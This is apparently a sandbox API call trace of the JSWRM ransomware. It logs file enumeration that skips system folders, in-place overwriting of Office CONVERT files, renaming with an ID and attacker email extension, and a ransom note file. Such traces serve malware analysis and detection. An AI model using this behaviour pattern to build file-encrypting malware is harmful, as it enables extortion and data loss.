[0129.312] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefca9683, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefca9683, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefccf8e4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x38d8, dwReserved0=0x60002, dwReserved1=0x225538, cFileName="TRANSMRR.DLL", cAlternateFileName="")) returned 1 [0129.313] lstrcmpiW (lpString1="TRANSMRR.DLL", lpString2=".") returned 1 [0129.313] lstrcmpiW (lpString1="TRANSMRR.DLL", lpString2="..") returned 1 [0129.313] lstrcmpiW (lpString1="TRANSMRR.DLL", lpString2="...") returned 1 [0129.313] lstrcmpiW (lpString1="TRANSMRR.DLL", lpString2="windows") returned -1 [0129.313] lstrcmpiW (lpString1="TRANSMRR.DLL", lpString2="recovery") returned 1 [0129.313] lstrcmpiW (lpString1="TRANSMRR.DLL", lpString2="perflogs") returned 1 [0129.313] lstrcmpiW (lpString1="TRANSMRR.DLL", lpString2="documents and settings") returned 1 [0129.313] lstrcmpiW (lpString1="TRANSMRR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.313] lstrcmpiW (lpString1="TRANSMRR.DLL", lpString2="system volume information") returned 1 [0129.313] lstrcmpiW (lpString1="TRANSMRR.DLL", lpString2="msocache") returned 1 [0129.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TRANSMRR.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TRANSMRR.DLL", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TRANSMRR.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TRANSMRR.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TRANSMRR.DLL", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TRANSMRR.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.313] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefca9683, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefca9683, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefccf8e4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x38d8, dwReserved0=0x60002, dwReserved1=0x225538, cFileName="TRANSMRR.DLL", cAlternateFileName="")) returned 0 [0129.313] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0129.313] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b60d2f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6b60d2f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6b60d2f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x90e8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="DELIMWIN.FAE", cAlternateFileName="")) returned 1 [0129.313] lstrcmpiW (lpString1="DELIMWIN.FAE", lpString2=".") returned 1 [0129.313] lstrcmpiW (lpString1="DELIMWIN.FAE", lpString2="..") returned 1 [0129.313] lstrcmpiW (lpString1="DELIMWIN.FAE", lpString2="...") returned 1 [0129.313] lstrcmpiW (lpString1="DELIMWIN.FAE", lpString2="windows") returned -1 [0129.313] lstrcmpiW (lpString1="DELIMWIN.FAE", lpString2="recovery") returned -1 [0129.313] lstrcmpiW (lpString1="DELIMWIN.FAE", lpString2="perflogs") returned -1 [0129.313] lstrcmpiW (lpString1="DELIMWIN.FAE", lpString2="documents and settings") returned -1 [0129.313] lstrcmpiW (lpString1="DELIMWIN.FAE", lpString2="$RECYCLE.BIN") returned 1 [0129.313] lstrcmpiW (lpString1="DELIMWIN.FAE", lpString2="system volume information") returned -1 [0129.313] lstrcmpiW (lpString1="DELIMWIN.FAE", lpString2="msocache") returned -1 [0129.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DELIMWIN.FAE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DELIMWIN.FAE", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DELIMWIN.FAE", lpUsedDefaultChar=0x0) returned 12 [0129.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DELIMWIN.FAE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DELIMWIN.FAE", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DELIMWIN.FAE", lpUsedDefaultChar=0x0) returned 12 [0129.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.314] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\DELIMWIN.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\delimwin.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.314] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=37096) returned 1 [0129.314] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.314] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x90e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x90e0, lpOverlapped=0x0) returned 1 [0129.325] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.325] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x90e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x90e0, lpOverlapped=0x0) returned 1 [0129.325] CloseHandle (hObject=0x238) returned 1 [0129.325] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\DELIMWIN.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\delimwin.fae"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\DELIMWIN.FAE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\delimwin.fae.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.326] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6e5cc4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7060, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="DESKSAM.SAM", cAlternateFileName="")) returned 1 [0129.326] lstrcmpiW (lpString1="DESKSAM.SAM", lpString2=".") returned 1 [0129.326] lstrcmpiW (lpString1="DESKSAM.SAM", lpString2="..") returned 1 [0129.326] lstrcmpiW (lpString1="DESKSAM.SAM", lpString2="...") returned 1 [0129.326] lstrcmpiW (lpString1="DESKSAM.SAM", lpString2="windows") returned -1 [0129.326] lstrcmpiW (lpString1="DESKSAM.SAM", lpString2="recovery") returned -1 [0129.326] lstrcmpiW (lpString1="DESKSAM.SAM", lpString2="perflogs") returned -1 [0129.326] lstrcmpiW (lpString1="DESKSAM.SAM", lpString2="documents and settings") returned -1 [0129.326] lstrcmpiW (lpString1="DESKSAM.SAM", lpString2="$RECYCLE.BIN") returned 1 [0129.326] lstrcmpiW (lpString1="DESKSAM.SAM", lpString2="system volume information") returned -1 [0129.327] lstrcmpiW (lpString1="DESKSAM.SAM", lpString2="msocache") returned -1 [0129.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DESKSAM.SAM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DESKSAM.SAM", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DESKSAM.SAM", lpUsedDefaultChar=0x0) returned 11 [0129.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DESKSAM.SAM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DESKSAM.SAM", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DESKSAM.SAM", lpUsedDefaultChar=0x0) returned 11 [0129.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\DESKSAM.SAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\desksam.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.327] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28768) returned 1 [0129.327] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.328] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7060, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x7060, lpOverlapped=0x0) returned 1 [0129.331] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.331] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7060, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x7060, lpOverlapped=0x0) returned 1 [0129.331] CloseHandle (hObject=0x238) returned 1 [0129.331] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\DESKSAM.SAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\desksam.sam"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\DESKSAM.SAM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\desksam.sam.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.332] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43b39ccb, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x43b39ccb, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x43b39ccb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0129.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0129.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0129.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0129.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0129.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0129.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0129.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0129.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0129.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0129.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0129.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.332] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x718b80, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x718b80, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x718b80, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9c60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="OL.SAM", cAlternateFileName="")) returned 1 [0129.332] lstrcmpiW (lpString1="OL.SAM", lpString2=".") returned 1 [0129.332] lstrcmpiW (lpString1="OL.SAM", lpString2="..") returned 1 [0129.333] lstrcmpiW (lpString1="OL.SAM", lpString2="...") returned 1 [0129.333] lstrcmpiW (lpString1="OL.SAM", lpString2="windows") returned -1 [0129.333] lstrcmpiW (lpString1="OL.SAM", lpString2="recovery") returned -1 [0129.333] lstrcmpiW (lpString1="OL.SAM", lpString2="perflogs") returned -1 [0129.333] lstrcmpiW (lpString1="OL.SAM", lpString2="documents and settings") returned 1 [0129.333] lstrcmpiW (lpString1="OL.SAM", lpString2="$RECYCLE.BIN") returned 1 [0129.333] lstrcmpiW (lpString1="OL.SAM", lpString2="system volume information") returned -1 [0129.333] lstrcmpiW (lpString1="OL.SAM", lpString2="msocache") returned 1 [0129.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OL.SAM", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0129.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OL.SAM", cchWideChar=6, lpMultiByteStr=0x345ebd8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OL.SAM", lpUsedDefaultChar=0x0) returned 6 [0129.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OL.SAM", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0129.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OL.SAM", cchWideChar=6, lpMultiByteStr=0x345eba8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OL.SAM", lpUsedDefaultChar=0x0) returned 6 [0129.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OL.SAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\ol.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.334] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=40032) returned 1 [0129.334] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.334] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x9c60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x9c60, lpOverlapped=0x0) returned 1 [0129.338] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.338] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x9c60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x9c60, lpOverlapped=0x0) returned 1 [0129.338] CloseHandle (hObject=0x238) returned 1 [0129.338] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OL.SAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\ol.sam"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OL.SAM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\ol.sam.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.339] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfae953d0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfae953d0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1774e9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x212e8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="OLADD.FAE", cAlternateFileName="")) returned 1 [0129.339] lstrcmpiW (lpString1="OLADD.FAE", lpString2=".") returned 1 [0129.339] lstrcmpiW (lpString1="OLADD.FAE", lpString2="..") returned 1 [0129.339] lstrcmpiW (lpString1="OLADD.FAE", lpString2="...") returned 1 [0129.339] lstrcmpiW (lpString1="OLADD.FAE", lpString2="windows") returned -1 [0129.339] lstrcmpiW (lpString1="OLADD.FAE", lpString2="recovery") returned -1 [0129.339] lstrcmpiW (lpString1="OLADD.FAE", lpString2="perflogs") returned -1 [0129.339] lstrcmpiW (lpString1="OLADD.FAE", lpString2="documents and settings") returned 1 [0129.339] lstrcmpiW (lpString1="OLADD.FAE", lpString2="$RECYCLE.BIN") returned 1 [0129.339] lstrcmpiW (lpString1="OLADD.FAE", lpString2="system volume information") returned -1 [0129.339] lstrcmpiW (lpString1="OLADD.FAE", lpString2="msocache") returned 1 [0129.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLADD.FAE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLADD.FAE", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLADD.FAE", lpUsedDefaultChar=0x0) returned 9 [0129.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLADD.FAE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLADD.FAE", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLADD.FAE", lpUsedDefaultChar=0x0) returned 9 [0129.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.340] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLADD.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\oladd.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.341] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=135912) returned 1 [0129.341] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.341] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x212e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x212e0, lpOverlapped=0x0) returned 1 [0129.351] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.352] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x212e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x212e0, lpOverlapped=0x0) returned 1 [0129.352] CloseHandle (hObject=0x238) returned 1 [0129.352] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLADD.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\oladd.fae"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\OLADD.FAE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\oladd.fae.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.353] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc646a83, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc646a83, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc646a83, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1e8f0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="OLAPPT.FAE", cAlternateFileName="")) returned 1 [0129.353] lstrcmpiW (lpString1="OLAPPT.FAE", lpString2=".") returned 1 [0129.353] lstrcmpiW (lpString1="OLAPPT.FAE", lpString2="..") returned 1 [0129.353] lstrcmpiW (lpString1="OLAPPT.FAE", lpString2="...") returned 1 [0129.353] lstrcmpiW (lpString1="OLAPPT.FAE", lpString2="windows") returned -1 [0129.353] lstrcmpiW (lpString1="OLAPPT.FAE", lpString2="recovery") returned -1 [0129.353] lstrcmpiW (lpString1="OLAPPT.FAE", lpString2="perflogs") returned -1 